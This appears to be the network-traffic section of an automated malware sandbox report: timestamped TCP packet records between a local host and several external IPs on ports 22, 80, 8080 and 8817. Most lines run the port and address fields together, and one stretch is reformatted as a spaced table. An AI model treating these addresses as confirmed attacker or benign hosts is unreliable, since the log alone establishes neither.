                                                                                                                                                                                                Sep 27, 2024 23:27:18.440980911 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.442225933 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.459820032 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.459901094 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:18.486709118 CEST4970722192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:18.511727095 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.511845112 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:18.559967041 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.560041904 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:18.607882977 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.616508007 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.624923944 CEST4971022192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:18.630629063 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.805650949 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.846062899 CEST4971022192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:36.821815014 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:36.832412004 CEST4970680192.168.2.5208.95.112.1
                                                                                                                                                                                                Sep 27, 2024 23:27:36.832720995 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:36.837738037 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:36.837835073 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:36.837884903 CEST8049706208.95.112.1192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:36.837939024 CEST4970680192.168.2.5208.95.112.1
                                                                                                                                                                                                Sep 27, 2024 23:27:36.837954998 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:36.843844891 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.190197945 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195327044 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195348978 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195363998 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195372105 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195379019 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195393085 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195429087 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195480108 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195540905 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195549965 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195558071 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195601940 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195626974 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195717096 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.195780039 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200273037 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200315952 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200345039 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200356960 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200385094 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200418949 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200432062 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200443029 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200450897 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200458050 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.200551987 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.243763924 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.244014025 CEST497298080192.168.2.5167.99.138.249
                                                                                                                                                                                                Sep 27, 2024 23:27:37.272965908 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.291723013 CEST808049729167.99.138.249192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:37.291975021 CEST497298080192.168.2.5167.99.138.249
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Sep 27, 2024 23:27:37.339751005 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:37.339811087 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:37.391959906 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:37.392019033 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:37.439769983 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:37.439940929 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:37.491708040 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:37.491862059 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:37.539700985 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:37.539875984 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:37.587698936 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:37.587778091 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:37.639733076 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:37.639796019 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:37.687737942 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:37.687823057 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:37.739717007 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:37.739799976 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:37.787766933 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:37.787843943 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:37.836168051 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:37.836239100 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:37.883735895 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:37.883795977 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:37.931761026 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:37.931930065 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:37.979742050 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:37.979914904 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.027700901 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.027764082 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.075709105 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.075877905 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.123744011 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.123806000 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.175745010 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.175796986 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.223727942 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.223786116 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.275770903 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.275826931 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.327778101 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.327832937 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.379734993 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.379790068 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.427725077 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.427829981 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.475709915 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.475799084 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.523699999 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.523874998 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.571733952 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.571795940 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.619704962 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.619791985 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.667712927 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.667762995 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.715797901 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.715874910 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.763715982 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.763766050 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.811759949 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.811821938 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.863743067 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.863795996 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.911712885 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.911786079 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:38.959686995 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:38.959764957 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:39.007699013 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:39.007775068 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:39.059752941 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:39.059910059 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:39.107732058 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:39.107862949 CEST  49729        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:39.159825087 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:42.165457964 CEST  49735        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:42.167507887 CEST  49709        80         192.168.2.5      208.95.112.1
Sep 27, 2024 23:27:42.170361042 CEST  8080         49735      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:42.170463085 CEST  49735        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:42.170727015 CEST  49735        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:42.172518015 CEST  80           49709      208.95.112.1     192.168.2.5
Sep 27, 2024 23:27:42.172579050 CEST  49709        80         192.168.2.5      208.95.112.1
Sep 27, 2024 23:27:42.176525116 CEST  8080         49735      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:43.530513048 CEST  49735        8080       192.168.2.5      167.99.138.249
Sep 27, 2024 23:27:58.208720922 CEST  8080         49729      167.99.138.249   192.168.2.5
Sep 27, 2024 23:27:58.210813999 CEST  49737        80         192.168.2.5      206.189.109.146
Sep 27, 2024 23:27:58.215851068 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.215915918 CEST  49737        80         192.168.2.5      206.189.109.146
Sep 27, 2024 23:27:58.216078997 CEST  49737        80         192.168.2.5      206.189.109.146
Sep 27, 2024 23:27:58.221016884 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.565079927 CEST  49737        80         192.168.2.5      206.189.109.146
Sep 27, 2024 23:27:58.570214987 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.570235968 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.570245981 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.570254087 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.570271969 CEST  49737        80         192.168.2.5      206.189.109.146
Sep 27, 2024 23:27:58.570297956 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.570318937 CEST  49737        80         192.168.2.5      206.189.109.146
Sep 27, 2024 23:27:58.570353031 CEST  49737        80         192.168.2.5      206.189.109.146
Sep 27, 2024 23:27:58.570384979 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.570394039 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.570400953 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.570432901 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.570437908 CEST  49737        80         192.168.2.5      206.189.109.146
Sep 27, 2024 23:27:58.570457935 CEST  49737        80         192.168.2.5      206.189.109.146
Sep 27, 2024 23:27:58.570485115 CEST  49737        80         192.168.2.5      206.189.109.146
Sep 27, 2024 23:27:58.571521044 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.571568966 CEST  49737        80         192.168.2.5      206.189.109.146
Sep 27, 2024 23:27:58.575114012 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.575158119 CEST  49737        80         192.168.2.5      206.189.109.146
Sep 27, 2024 23:27:58.575261116 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.575268984 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.575314045 CEST  49737        80         192.168.2.5      206.189.109.146
Sep 27, 2024 23:27:58.575330973 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.575340033 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.575391054 CEST  49737        80         192.168.2.5      206.189.109.146
Sep 27, 2024 23:27:58.575457096 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.575500965 CEST  49737        80         192.168.2.5      206.189.109.146
Sep 27, 2024 23:27:58.575830936 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.575917959 CEST  49737        80         192.168.2.5      206.189.109.146
Sep 27, 2024 23:27:58.619882107 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.620125055 CEST  49737        80         192.168.2.5      206.189.109.146
Sep 27, 2024 23:27:58.648814917 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.649096966 CEST  49737        80         192.168.2.5      206.189.109.146
Sep 27, 2024 23:27:58.654051065 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.654145002 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.654243946 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.654328108 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.654362917 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.654419899 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.654428005 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.654436111 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.654488087 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.654495955 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.654503107 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.654534101 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.654542923 CEST  80           49737      206.189.109.146  192.168.2.5
Sep 27, 2024 23:27:58.654551029 CEST  80           49737      206.189.109.146  192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654606104 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654613972 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654676914 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654757977 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654768944 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654786110 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654886961 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654895067 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654975891 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654989958 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.654998064 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.655006886 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.655014992 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.655061007 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.655071020 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.655090094 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.655102968 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.655126095 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:58.655134916 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.097068071 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.097119093 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.097166061 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:59.106456995 CEST4973780192.168.2.5206.189.109.146
                                                                                                                                                                                                Sep 27, 2024 23:27:59.107304096 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.111222029 CEST8049737206.189.109.146192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.112126112 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.112262011 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.114850998 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.119760990 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.471261978 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476402998 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476418972 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476475954 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476480007 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476531982 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476558924 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476573944 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476584911 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476612091 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476641893 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476671934 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476680994 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476716042 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476725101 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476759911 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476766109 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.476815939 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481276035 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481331110 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481338024 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481347084 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481353998 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481400967 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481420040 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481429100 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.481477976 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.523775101 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.523921013 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.552196026 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.552530050 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557410002 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557435036 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557460070 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557513952 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557539940 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557548046 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557595015 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557604074 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557611942 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557651043 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557658911 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557723045 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557732105 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557774067 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557787895 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557876110 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557957888 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.557966948 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.558051109 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.558118105 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.558136940 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.558151960 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.558223963 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:59.558456898 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.006097078 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.006333113 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.006541967 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:28:00.006694078 CEST4973880192.168.2.545.82.65.63
                                                                                                                                                                                                Sep 27, 2024 23:28:00.007095098 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:00.011513948 CEST804973845.82.65.63192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.011993885 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.012096882 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:00.012242079 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:00.017071009 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.361866951 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:00.366864920 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.366938114 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:00.366982937 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.366991997 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.366997957 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.367022991 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.367028952 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.367032051 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.367038965 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.367047071 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.367054939 CEST881749739188.120.242.78192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:28:00.367101908 CEST497398817192.168.2.5188.120.242.78
                                                                                                                                                                                                Sep 27, 2024 23:28:00.371845961 CEST881749739188.120.242.78192.168.2.5
